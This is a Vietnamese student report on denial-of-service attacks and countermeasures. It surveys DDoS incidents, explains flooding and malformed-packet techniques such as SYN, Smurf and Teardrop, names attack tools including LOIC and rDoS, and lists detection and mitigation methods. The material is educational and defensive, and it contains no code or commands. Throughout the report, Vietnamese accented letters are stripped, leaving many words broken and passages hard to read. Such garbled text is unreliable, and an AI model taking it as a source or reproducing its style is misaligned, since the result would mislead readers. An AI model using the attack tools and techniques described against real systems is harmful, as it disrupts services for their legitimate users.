B GIAO THNG VN TI I HC GIAO THNG VN TI TP.

H CH MINH KHOA IN-IN T VIN THNG

TI:
N CNG MANG BNG DOS K THUT T V CCH PHNG CHNG
GVHD : HUNH TH SVTH : 1.NGUYN VN CNG MSSV: 0951150005 2. V TN CNG MSSV: 0951150006

TP.HCM ngy 20 thng 12 nm 2012

 U I M L
Bo mt an ninh mng hin nay c t ln hng u vi bt k cng ty no c h thng mng d ln hay nh. Hin nay, cc hacker trong v ngoi nc lun tm cch tn cng v xm nhp h thng ly cc thng tin ni b.Nhng thng tin nhy cm thng nh hng ti sng cn ca cng ty.Chnh v vy, cc nh qun tr mng lun c gng bo v h thng ca mnh tt nht c th v c gng hon thin h thng mnh bt l hng. Tuy nhin, mt kiu tn cng rt c in l tn cng t chi dch v cha bao gi mt i tnh nguy him i vi h thng mng. Hu qu m DoS gy ra khng ch tiu tn nhiu tin bc, v cng sc m cn mt rt nhiu thi gian khc phc. DoS v DDoS vn ang l vn nan gii cha c bin php no chng c hon ton cuc tn cng. Vi yu cu cp thit nh vy, nhm em chn ti Tm hiu k thut tn cng DoS v cch phng chng lm n An Ninh Mng. Mc ch a ra khi lm ti l hiu c cc kiu tn cng v t a ra cch phng chng DoS.

MUC LUC
TI: DOS ATTACK
PHN I: TNG QUAN V TN CNG MNG Trang I. Nhng s kin v cc cuc tn cng mng4 II. Hiu bit v cc cuc tn cng mng.6 III. Nhng nguy c nh hng n an ton mng7 PHN II :TN CNG T CHI DCH VU DOS I . DoS attack l g ? 12 II. Cc k thut tn cng DoS..14 III. Mt s cng c tn cng DoS.23 PHN III :CCH PHNG CHNG DOS I. Nhng bin php i ph DoS27 II. Cng c phng chng DoS31 III . Kim tra thm nhp DoS34 PHN IV :HNG DN & DEMO CCH TN CNG DOS

PHN I: TNG QUAN V TN CNG MNG

I. NHNG S KIN V CC CUC TN CNG MNG
1.S kin bo mt ca nm 2011
VietNamNet b tn cng DDoS ln cha tng c Trong vi ngy qua, bo VietNamNet phi hng chu mt cuc tn cng t chi dch v phn tn (DDoS) quy m ln cha tng c ti Vit Nam, xut pht t mt mng li khng l gm hng chc ngn my tnh b nhim vi rt. Bt u t cui ngy 4/1/2011, lu lng truy cp vo trang ch bo VietNamNet ti a ch http://vietnamnet.vn tng nhanh mt cch bt thng, ln ti hng trm ngn kt ni ti mt thi im. Vi lng c gi truy cp hng ngy, s lng kt ni ti mt thi im ch mc di mt trm ngn. Nn vic ti mt thi im c ti hng trm ngn kt ni lin tc (bao gm c ca cc c gi thng thng) ti my ch web khin bng thng ng truyn mng b qu ti. Do vy, c gi truy cp vo bo VietNamNet s b tc nghn ngay t ng truyn v bo li khng tm thy my ch, phi truy cp vi ln mi m c trang web. Trn thc t, bo VietNamNet tng b tn cng DDoS nhiu ln nhng quy m vi chc ngn kt ni ti mt thi im nn bng thng h thng v cng sut cc my ch vn c th chu ng c.Trong cuc tn cng DDoS ang din ra, k th c th hin kh nng rt chuyn nghip khi huy ng mt mng li botnet vi lng my ln ti hng chc ngn my tnh. "Hacktivism" ni dy Hacktivism l thut ng din t hnh ng tn cng, t nhp vo mt h thng my tnh nhm mc ch chnh tr. Trn th gii hin nay, nhng nhm hacker mang "mc" hacktivism ni ting c th k n bao gm Anonymous, LulzSec ( gc kim), hay TeaMp0isoN. Trong sut nm 2011 qua, cc nhm hacktivism tin hnh nhiu hot ng khc nhau chng li cc c quan lut php, ngn hng, chnh ph, cc cng ty bo mt v nhng nh cung cp phn mm nh tn cng l thng an ninh cc h thng ca T chc Lin hip quc (UN ), c quan tnh bo bo mt Straffor, CIA ng lu hn na, trong s nhng s vic ny, nh cuc tn cng Straffor, tit l nhng l hng v mt an ninh nh vic lu tr cc s th tn dng di
4

hnh thc cha c m ha, hay nhng mt khu v cng thiu an ton c cc nh qun l s dng.

2.Cng ty cung cp gii php bo mt cho chnh ph Hoa K b tn cng

Vo thng 1-2011, nhng hacker thuc Anonymous t nhp my ch web ca HBGary Federal hbgaryfederal.com thng qua vic s dng nhng on m SQL bt hp php nhm khai thc mt l hng bo mt tn ti trong c s d liu ca mt ng dng. Sau trch xut m MD5 cho cc mt khu thuc s hu ca gim c iu hnh (CEO), Aaron Barr, v COO, Ted Vera. C hai u dng mt khu rt n gin: 6 k t thng v 2 con s. Nhng mt khu nh th ny cho php nhng k tn cng tip cn vo nhng ti liu nghin cu ca cng ty v hng chc ngn email c lu tr trong Google Apps. Nh vy, vic s dng nhng mt khu thiu an ton cho h thng phn mm c cng vi vic s dng in ton m my gy ra cn c mng i vi an ninh bo mt.

3.Cc cuc tn cng DDoS ni ting trong lch s

- Nm 2000, mt lot website ni ting nh Yahoo, eBay, eTrade, Amazon v CNN tr thnh nn nhn ca DDoS. - Thng 2/2001, my ch ca Cc ti chnh Ireland b mt s sinh vin i hc Maynooth nc ny tn cng DDoS. - Ngy 15/8/2003, Microsoft chu t tn cng DoS cc mnh v lm gin on websites trong vng 2 gi. - Thng 2/2007, hn 10.000 my ch ca game trc tuyn nh Return to Castle Wolfenstein, Halo, Counter-Strike b nhm RUS tn cng vi h thng iu khin ch yu t ti Nga, Uzbekistan v Belarus. - Ngy 25/6/2009 khi Michael Jackson qua i, lng truy cp tm kim cc t kha c lin quan n ca s ny qu ln khin Google News lm tng y l mt cuc tn cng t ng. - Thng 8/2009, cc v DDoS nhm ti mt lot trang mng x hi nh m nh Facebook, Twitter, LiveJournal v mt s website ca Google c thc hin ch "kha ming" mt blogger c tn Cyxymu Georgia - Ngy 7/12/2010, nhm hacker c tn Anonymous nh sp website Visa.com sau khi t chc nhng cuc tn cng tng t vo Mastercard v PayPal tr a cho vic ch WikiLeaks b tm giam Anh. - Ngy 3/3/2011, dch v blog ni ting th gii WordPress b tn cng. - Ngy 4/3/2011, 40 trang web ca cc c quan chnh ph Hn Quc b t lit v DDoS.

II. HIU BIT V TN CNG MNG

Mt cuc tn cng mng c th c nh ngha l bt k phng php, quy trnh, phng tin c s dng c hi c gng tha hip an ninh mng. C mt s l do m mt c nhn mun tn cng mng doanh nghip.Cc c nhn thc hin cc cuc tn cng mng thng c gi l k tn cng mng, tin tc, Mt vi loi khc nhau ca hot ng c hi m k tn cng mng v tin tc thc hin c tm tt y:

S dng tri php ti khon ngi dng v c quyn n cp phn cng Phn mm nh cp Chy m cho cc h thng thit hi Chy m thit hi v d liu tham nhng Sa i d liu c lu tr n cp d liu S dng d liu cho li ch ti chnh hoc hot ng gin ip cng nghip Thc hin cc hnh ng ngn chn ngi dng hp php c thm quyn truy cp vo cc dch v mng v cc ngun lc. Thc hin hnh ng lm cn kit ti nguyn mng v bng thng.

III. NHNG NGUY C NH HNG N AN TON MNG

1. "Tay trong"
Trong mt s doanh nghip va v nh, nhng d liu kinh doanh quan trng hay thng tin khch hng thng c giao ph cho mt c nhn. iu ny to nn tnh trng "l thuc quyn hn" nguy him. Ton b bn ghi (log) h thng mng, nhng bo co t ng s khng c kim tra thng xuyn t ban qun tr.Vic tht thot d liu c th din ra trong khong thi gian di m khng b pht hin.

2. Khng c k hoch x l ri ro
H thng my tnh, mng ca doanh nghip lun phi i mt vi nhiu nguy c bo mt, t vic h hng vt l cho n cc trng hp b tn cng t tin tc hay virus u c kh nng gy tn hi cho d liu. Kh nhiu doanh nghip va v nh thiu hn chnh sch phn ng vi vic tht thot d liu hay k hoch khc phc s c. i a s u lng tng v bt u cc hot ng mang tnh ng ph.

3. Nhng thit lp mc nh khng c thay i

Tin tc hin nay thng dng cc tp tin cha ng hng trm ngn ti khon mc nh (username v password) ca cc thit b kt ni mng d tm quyn hn truy xut kh nng ng nhp vo h thng mng. Nu cc ti khon, thit lp mc nh khng c thay i, tin tc s d dng chim quyn iu khin ti nguyn mng.

4. Mi trng mng ti gia khng an ton

i vi mt vi doanh nghip nh, cc nhn vin thng em my tnh xch tay (laptop) ca mnh n vn phng lm vic. Trong mi trng mng ti gia nh, ch bo mt thng rt km hay thm ch khng c nhng thit lp bo v. Do , nhng chic laptop ca nhn vin c th l ngun gc pht tn virus, malware hay tr thnh zombie trung gian tin tc tn cng vo h thng mng ca doanh nghip.

5. Thiu cnh gic vi mng cng cng

Mt th on chung tin tc hay s dng dn d nhng nn nhn l t mt thit b trung chuyn wireless access-point khng ci t mt khu (unsecured) ri gn mt ci nhn nh "Mng Wi-Fi min ph" v rung i ngi ch nhng kt ni "ngy th" ri vo by. Tin tc s dng cc cng c thu tm gi d liu mng gip nhn bit c nhng vn bn hay bt k nhng g m nhn vin doanh nghip g ri gi ra ngoi.

6. Mt mt thit b di ng
Rt nhiu doanh nghip, thm ch gn y cn c c mt vi hng ln b tht thot d liu quan trng do mt cp my tnh xch tay, tht lc in thoi di ng hay cc a flash USB lu tr. D liu trong cc thit b ny thng t c m ha hay bo v bng mt khu, rt d dng x l mt khi s hu chng.

7. Li t my ch web
Hin cn kh nhiu doanh nghip khng coi trng vic t website ca mnh ti my ch no, mc bo mt ra sao. Do , website kinh doanh ca doanh nghip s l mi ngon ca cc t tn cng SQL Injection hay botnet.

8. Duyt web trn lan

Khng phi nhn vin vn phng no cng am hiu tng tn v nhng him ha rnh rp trn mng Internet nh malware, spyware, virus, trojan... H c v t truy cp vo cc website khng xc nh hoc b dn d click vo nhng website c tin tc by c cho n v th l my tnh ca nhn vin s l cnh ca gip tin tc xm nhp vo trong mng ca doanh nghip.

9. Email cha ng m c
Nhng cuc di bom th rc s lm trn ngp hp th ca bn vi nhng tiu hp dn nh nhng v scandal tnh i, hnh nh nng bng hay cc li mi cho kinh doanh... ch mt c nhp chut sai lm th ngay lp tc my tnh s ti v cc on m c lm tin cho hng lot phn mm c hi i sau xm nhp vo my tnh.

10. Khng v li bo mt
8

Hn 90% cc cuc tn cng vo h thng mng u c gng khai thc cc li bo mt c bit n.Mc d cc bn v li vn thng xuyn c nhng hng sn xut cung cp ngay sau khi li c pht hin nhng mt vi doanh nghip li khng coi trng vic cp nht li thng nht dn n vic cc li bo mt m toang cng cho n nhng cuc tn cng.

11. Mt s nguy c khc

+ L hng Zero-day i vi cc phn mm ca Adobe (Flash Player, Adobe Reader v Acrobat). y l l hng mi pht hin trong thng 3/2011 v c nh gi l li nghim trng. N cho php k tn cng thc thi cc m lnh v c th chim quyn iu khin h thng.Ti phm mng nh km m c di hnh thc tp tin Flash (.swf) vo cc ti liu c nh dng pdf hoc Excel. + Su Conficker xut hin t kh sm ti Vit Nam v lin tc c nhiu bin th khc nhau; ngy cng tr nn nguy him. c tnh, c n hng triu my tnh trn th gii ang nhim su Conficker v v tnh tr thnh mng my tnh botnet gip cho cc hacker t chc cc t tn cng DDoS quy m ln. + Hin ti, ang xut hin loi malware (m c) khi ly nhim vo my tnh s chim quyn iu khin h thng v a ra cc thng bo gi mo. Malware ny tn cng vo cc my tnh s dng Windows khng c bn quyn v a ra ngh kch hot dch v.Nhiu ngi tiu dng mt tin oan khi gi in thoi lin lc vi tng i (do hacker ch nh) ly m s kch hot Windows.

12. Nhng im yu trong vn bo mt:

Hiu c nhng im yu trong bo mt l mt vn ht sc quan trng tin hnh nhng chnh sch bo mt c hiu qu. Hiu nhng im yu ny gip bo mt mng trc khi b hacker tn cng. Cisco xc nh nhng im yu trong bo mt gm c: technology weaknesses, configuration weaknesses v policy weaknesses.

12.1) Technology weaknesses:

im yu trong k thut gm c im yu trong protocol, operating system va hardware. 12.1.1) TCP/IP weaknesses:

Giao thc TCP/IP l im yu trong bo mt v n c thit k nh mt tiu chun m giup cho vic trao i thng tin c d dng . iu lm cho n tr nn s du ng r ng rai nhng cung lm cho n d dng b tn cng v hu ht mi ngi u thn thuc vi cch thc TCP/IP lm vic. Hai giao thc m Cisco thch la chn trong chm giao thc TCP/ IP nhng vn c hu li khng c bo mt la SMTP ( TCP ) va SNMP ( UDP ). in hnh ca k thut tn cng vo hai giao thc ny l IP spoofing, man-in-the-middle v session replay. 12.1.2) Operating System weaknesses: Trong khi tt c cc h iu hnh u c im yu th Linux v Unix c xem nh l t c im yu hn Windows. Thc t, hu ht mi ngi dng cc phin bn ca Windows. 12.1.3) Network equipment weaknesses: Hu ht cc thit b mng nh l servers, switchs, routers u c iu yu trong bo mt. Nhng co mt chnh sch tt cho vic cu h nh v lp t cho cc thit b mng s lm gim i rt nhi u s nh hng ca im yu ny.

12.2) Configuration weaknesses:

y l li do nh qun tr to ra . Li ny do cc thiu st trong vic cu hnh nh l : khng bo mt ti khon khch hng , h thng ti khon vi password d dng on bit, khng bo mt cc cu hnh mc nh trn thit b hay li trong vi c cu hnh thit b. 12.2.1) Unsecured user account: Mi user account cn c usename v password cho mc ch bo mt. Cc username v password ny thng c truyn i dng clear text trn mng. Do , cn c chnh sch bo mt user account nh m ho, authentication 12.2.2) System account with easily guessed password: Mt im yu trong li cu hnh khc l bo mt account vi password d dng b nh cp . ngn chn tnh trng , ngi qun tr cn c chnh sch khng cho php mt password co hi u lc mi mi m password ny phi c mt thi hn kt thc. 12.2.3) Misconfigured Internet services:
10

Mt vi cng ty s dng a ch tht trn mng internet nh a ch cho hosts v servers. iu ny to nn im yu m cc hacker s d dng khai thc thng tin. S dng giao thc NAT hoc PAT c th gii quyt vn trn. S dng a ch ring ( private address ) cho php nh a ch hosts v servers ma khng cn dng a ch tht trn mng, trong khi a ch tht th c border router nh tuyn ra mng internet. khng phi l bin php ti u. Port trn interface kt ni ra internet phi trng thi open cho php users vo mng internet v ngc li. l l hng trn bc tng la ( firewall ) m hacker c th tn cng vo. Bn c th to ra tnh bo mt cho network bng cch s dng conduits , l kt ni bo mt c bn. Cisco Secure Private Internet Echange ( PIX ) firewall l bin php ti u to ra tnh bo mt tt cho mng. 12.2.4) Unsecured default settings in product: Nhiu sn phm phn cng c cung cp m khng c password hoc l password sn c gip cho nh qun tr d dng cu hnh thit b. N lm cho cng vic d dng hn, nh mt s thit b ch cn cm vo v hot ng. iu ny s gip cho s tn cng mng tr nn d dng. Do , ta cn phi thit lp mt chnh sch cu hnh bo mt trn mi thit b trc khi thit b c lp t vo h thng mng. 12.2.5) Misconfigured Netword Equipment: Li cu hnh thit b l mt l h ng c th khai thc tn cng mng: password yu, khng c chnh sch bo mt hoc khng bo mt user account u l li cu hnh thit b. Phn cng v nhng giao thc chy trn thit b cng to ra l hng bo mt trong mng.Nu bn khng c chnh sch bo mt cho phn cng v nhng giao thc ny th hacker s li dng tn cng mng. Nu bn s dng SNMP c mc nh thit lp th thng tin c th b nh cp mt cch d dng v nhanh chng. Do , hy chc chn l bn lm mt hiu lc ca SNMP hoc l thay i mc nh thit lp SNMP c sn. 12.3) Policy weaknesses:
11

Chnh sch bo mt din t lm th no v u chnh sch bo mt c thc hin. y l iu kin quan trng gip vic bo mt c hiu qu tt nht.

PHN II: TN CNG T CHI DCH VU DOS

IGII THIU V DOS 1. Khi nim
Denial Of Services Attack (tn cng t chi dch v ) l kiu tn cng rt li hi, vi loi tn cng ny, bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c my tnh ca i phng . Thc cht ca DoS attack l hacker s chim dng mt lng ln ti nguyn trn server ( ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm cho server khng th no p ng cc yu cu t cc my ca ngui khc ( my ca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot.

2. Cc mc ch ca tn cng DoS
C gng chim bng thng mng v lm h thng mng b ngp (flood), khi h thng mng s khng c kh nng p ng nhng dch v khc cho ngi dng bnh thng. C gng lm ngt kt ni gia hai my, v ngn chn qu trnh truy cp vo dch v. C gng ngn chn nhng ngi dng c th vo mt dch v no C gng ngn chn cc dch v khng cho ngi khc c kh nng truy cp vo. Khi tn cng DoS xy ra ngi dng c cm gic khi truy cp vo dch v nh b: + Disable Network - Tt mng + Disable Organization - T chc khng hot ng + Financial Loss Ti chnh b mt

12

3. Mc tiu m k tn cng thng s dng tn cng DoS

Nh chng ta bit bn trn tn cng DoS xy ra khi k tn cng s dng ht ti nguyn ca h thng v h thng khng th p ng cho ngi dng bnh thng c vy cc ti nguyn chng thng s dng tn cng l g: To ra s khan him, nhng gii hn v khng i mi ti nguyn Bng thng ca h thng mng (Network Bandwidth), b nh, a, v CPU Time hay cu trc d liu u l mc tiu ca tn cng DoS. Tn cng vo h thng khc phc v cho mng my tnh nh: h thng iu ho, h thng in, ht hng lm mt v nhiu ti nguyn khc ca doanh nghip. Bn th tng tng khi ngun in vo my ch web b ngt th ngi dng c th truy cp vo my ch khng. Ph hoi hoc thay i cc thng tin cu hnh. Ph hoi tng vt l hoc cc thit b mng nh ngun in, iu ho

4. Du hiu khi b tn cng DoS

Thng thng th hiu sut mng s rt chm. Khng th s dng website. Khng truy cp c bt k website no. Tng lng th rc nhanh chng.

13

II. CC K THUT TN CNG DOS

1. Winnuke

Hnh 2.1 Gi tin TCP Header c Attacker s dng

DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x. Hacker s gi cc gi tin vi d liu "Out of Band" n cng 139 ca my tnh ch.( Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band c bt ). Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s c hin th ln vi nn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash .

2. Ping of Death

14

Hnh 2.2 M hnh tn cng Ping Of Death

Tn cng Ping of Death (hay PoD) c th lm t lit c mng li da trn l hng ca h thng TCP/IP. Kch thc ti a cho 1 gi d liu l 65,535 bytes. Nu ta gi cc gi tin ln hn nhiu so vi kch thc ti a thng qua lnh ping n my ch th s lm my tnh ch b treo. Nhng gi 1 gi tin ln hn kch thc quy nh l iu tri vi lut ca giao thc TCP/IP,v vy Hacker kho lo gi cc gi tin trn cc on phn mnh. Khi my tnh victim rp cc phn mnh d liu th s nhn thy gi tin qu ln. iu ny s gy ra li trn b m v treo cc thit b. Nhng n nay th hu ht cc thit b c sn xut sau nm 1998 min dch vi loi tn cng ny.

3. Teardrop

15

Hnh 2.3 C ch tn cng bng Teardrop

Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng ngun, mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi tr offset sp xp cc mnh li vi nhau theo th t ng nh ban u . Li dng s h , ta ch cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. H thng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng cho ln nhau qu ln !

4. SYN Attack
SYS

TCP Client
ClientPort 1024-65535

SYN/ACK

TCP Server
80

ACK

ServicePort 1-1023

SYS packet with a deliberately fraudulent (spoofed) source IP return address

Malicious TCP Client

SYN

Victim TCP Server

80

?
SYS/ACK

Client SYN
SYN/ACK

Server

Attacker/Agent SYN

Server
SYN/ACK

SYN/ACK

ACK

Hnh 2.4 M hnh tn cng bng SYN Flood Attack

16

Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch IP ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li cc a ch khng c thc v ch i nhn thng tin phn hi t cc a ch IP gi . V y l cc a ch IP khngc thc, nn h thng ch s s ch i v ch v cn a cc "request"ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n b crash hoc boot my tnh .

5. Land Attack

Hnh 2.5 M Hnh tn cng bng Land Attack

Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch IP khng c thc, hacker s dng chnh a ch IP ca h thng nn nhn. iu ny s to nn mt vng lp v tn gia trong chnh h thng nn nhn ,gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng p lng ng .

6. Smurf Attack

17

Hnh 2.6 M hnh tn cng Smuft Attack Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuch i (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c a ch IP ngun chnh l a ch IP ca nn nhn . Khi cc packets n c a ch broadcast ca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi tr li h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khng l cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cn gi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch i lng gi tin ICMP packets ny ln gp bi . T l khuch i ph thuc vo s mng tnh c trong mng khuch i . Nhim v ca cc hacker l c chim c cng nhiu h thng mng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua ch lc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tin hnh Smurf Attack trn cc h thng cn tn cng . == >nh tng lc .

7. Fraggle Attack

18

Hnh 2.7 M Hnh tn cng bng Fraggle Attack

Tng t nh Smurt attack nhng thay v dng gi tin ICMP ECHO REQUEST th s dng cch tn cng ny s dng gi tin UDP ECHO gi n mc tiu. Nhng Flaggle Attack nguy him hn Smurt attack rt nhiu.V Attacker tn cng bng mt gi tin ECHO REQUEST vi a ch bn nhn l mt a ch broadcast, ton b h thng thuc a ch ny lp tc gi gi tin REPLY n port echo ca victim, sau t victim mt gi tin ECHO REPLY li gi tr v a ch broadcast, v qu trnh c th tip din.

8. UDP Flooding

Hnh 2.8 M hnh tn cng bng UDP Flood

19

Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho h thng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo a ch IP ca cc gi tin l a ch loopback (127.0.0.1 ) , ri gi gi tin ny n h thng ca nn nhn trn cng UDP echo( 7 ). H thng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n) gi n , kt qu l n s i vng mt vng lp v tn. Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch IP ca mt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nn nhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s b y.

9. Tn cng DNS
Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xm nhp thnh a ch IP, lp tc DNS ( b hacker thay i cache tm thi ) s i thnh a ch IP m hacker cho ch n . Kt qu l thay v phi vo trang Web mun vo th cc nn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht hu hiu !.

10. Distributed DoS Attacks ( DDos )

Attacker:k tn cng Handler: my tnh b iu khin bi Attacker Zombie: my tnh b iu khin bi Handler Victim: nn nhn tn cng ca Attacker

Hnh 2.10 M hnh tn cng DDos DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h
20

thng ny chng trnh DDoS server. By gi cc hackers s hn nhau n thi gian nh s dng DDoS client kt ni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n h thng nn nhn .

11. The Distributed Reflection Denial of Service Attack(DRDoS )

y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht. Cch lm th cng tng t nh DDos nhng thay v tncng bng nhiu my tnh th ngi tn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n cc server mnh nht, nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tin thng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt ni Internet n ginvi ng truyn bnh thng cng c th nh bt c h thng c ng truyn tt nht th gii nu nh ta khng kp ngn chn . Trang WebHVA ca chng ta cng b DoS va ri bi cch tn cng ny y.

21

Hnh 2.10 M hnh tn cng DRDos

22

III: NHNG CNG CU TN CNG DOS

1. DoSHTTP + Sprut:

Hnh 3.1 Giao din tool DoSHTTP v Sprut

y l 2 phn mm lm Flood Website mc nh v n thc hin bng cch gi cc gi tin Request n port 80 ca website. DoSHTTP l mt phn mm s dng d dng, mnh m tn cng trn ngp HTTP nhm mc ch kim th trn Windows. DoSHTTP bao gm xc nhn URL, chuyn hng HTTP v gim st hiu sut.Cng c DoSHTTP c th gip cc chuyn gia CNTT th nghim hiu nng my ch web v nh gi bo mt.

23

2. LOIC

Hnh 3.2 Giao din tool LOIC

LOIC l ng dng tn cng t chi dch v, c vit bng C#. Loic thc hin tn cng t chi dch v tn cng (hoc khi c s dng bi nhiu c nhn, s l mt cuc tn cng DDoS). Trn mt trang web mc tiu lm ngp cc my ch vi cc gi tin TCP hoc UDP vi nh lm gin on dch v ca mt my ch c th. Cng c LOIC l mt botnet tnh nguyn kt ni n mt my ch t xa m ch o cc cuc tn cng. Hin nay, c 40.000 ngi kt ni vi botnet.

24

3. UDP Flood

Hnh 3.3 Giao din phn mm UDP Flood

UDPFlood l mt chng trnh gi cc gi tin UDP. N gi ra ngoi nhng gi tin UDP ti mt a ch IP v port khng c nh. Gi tin c kh nng l mt on m vn bn hay mt s lng d liu c sinh ngu nhin hay t mt file c s dng kim tra kh nng p ng ca server.

25

4. rDoS

Hnh 3.4 Giao din tool rDoS

Phn mm chy trn nn TCP v phng php tn cng l lm ngp lt SYN. Ch cn nhp IP ca Vitim v Port mun tn cng th chng trnh s t ng chy.
Lu :Khi s dng th phi cn thn v thot ra ng cch v nu khng my

tnh ca mnh s t ng tn cng DoS ti victim ch nh khi mnh bt my ln,d cha lm 1 thao tc no. kim tra th chng ta s dng WireShark s thy r vn .

26

PHN III. CCH PHNG CHNG DOS

I. NHNG BIN PHP I PH DOS
1. K thut pht hin
K thut pht hin da trn nhn bit, phn bit nh tng ln dng d liu khng hp l v trng hp flask t lu lng gi tin hp l.Tt c k thut pht hin nh ngha tn cng khng bnh thng v ng ch lch t khong thi gian lu lng mng trng thi thng k bnh thng . 1.1 Hot ng nh hnh Mt tn cng c nhn bit bng: Tng hot ng gia cc clusters. Tng ton b s lng r rng clusters (tn cng DDoS). Hot ng nh hnh thu c bng cch gim st thng tin header ca gi tin trong mng. N l tc trung bnh lu lng mng bao gm gi tin lin tip vi trng gi tin ging nhau. 1.2 Phn tch wavelet Phn tch wavelet c m t l tn hiu vo u cui bao gm quang ph. Phn tch mi quang ph nng lng xc nh hin tng bt thng. Wavelets cung cp ng b thi gian v m t tn s. H xc nh thi gian chnh xc gm cc tn s hin din. 1.3 Pht hin thay i im theo trnh t Thut ton pht hin thay i im m t lu lng thng k nguyn nhn thay i bi cuc tn cng. H bt u lc lu lng d liu ti ch bng a ch, cng hoc giao thc v lu tr kt qu thnh chui thi gian. nhn din v nh v cuc tn cng DoS cc thut ton cusum xc nh lch trong mc trung bnh thc t cc b so vi d kin trong chui thi gian giao thng. Bn cng c th dng nhn bit worm thng thng bng hot ng scanning.

27

2. Bin php i ph chin lc DoS

Hp th cuc tn cng:Dng kh nng ph hp th tn cng, yu cu k hoch trc. Lm gim dch v:Nhn bit dch v nguy him v dng dch v khng nguy him. Tt dch v: Tt tt c dch v cho ti khi cuc tn cng gim bt.

3. Bin php i ph tn cng DoS

3.1 Bo v th cp victims Ci t phn mm anti-virus, anti-Trojan v cp nhp bn mi. Tng nhn thc v vn bo mt v k thut ngn chn ngi s dng t tt c ngun trn internet. Tt dch v khng cn thit, g b ng dng khng s dng, v qut tt c files nhn t ngun bn ngoi. Cu hnh v thng xuyn cp nhp xy dng c cu phng th trn li phn cng v phn mm h thng. 3.2 Pht hin tim nng tn cng B lc xm nhp: Bo v t tn cng trn ngp c ngun gc t cc tin t hp l. N cho php ngi khi to truy tm ngun gc thc s. B lc i ra: Qut header gi tin ca gi tin IP ra mt mng. B lc i ra khng chng thc hoc lu lng nguy him khng c ra khi mng bn ngoi. Ngt TCP: Cu hnh ngt TCP ngn nga tn cng bng cch ngt v yu cu kt ni TCP hp l.

28

3.3 Lm lch hng tn cng H thng thit lp vi gii hn bo mt, cng bit nh l honeypot, hot ng cm d i vi k tn cng. Phc v c ngha l ginh thng tin t k tn cng bng cch lu tr mt bn ghi cc hot ng, hc kiu tn cng v cng c phn mm k tn cng s dng. Dng phng th chiu su tip cn vi IPSec ti im mng khc nhau chuyn hng ng ng lung DoS n vi honeypot. Honeypot l mt h thng ti nguyn thng tin c xy dng vi mc ch gi dng nh la nhng k s dng v xm nhp khng hp php, thu ht s ch ca chng, ngn khng cho chng tip xc vi h thng tht. 3.4 Lm du cuc tn cng Cn bng ti: o Nh cung cp tng bng thng trn kt ni quan trng ngn nga v gim xung tn cng. o Nhn bn my ch c th cung cp thm bo v an ton. o Cn bng ti cho mi server trn cu trc nhiu server c th ci tin hiu sut bnh thng nh l gim nh hng ca cuc tn cng DoS. Hot ng iu chnh: o Thit lp cch thc router truy cp mt server vi iu chnh logic lu lng i vo ti mc s an ton server x l. o B x l c th ngn nga trn ngp thit hi ti server. o B x l ny c th m rng iu chnh lung tn cng DoS i lp lu lng hp php ca ngi s dng cho kt qu tt hn.

29

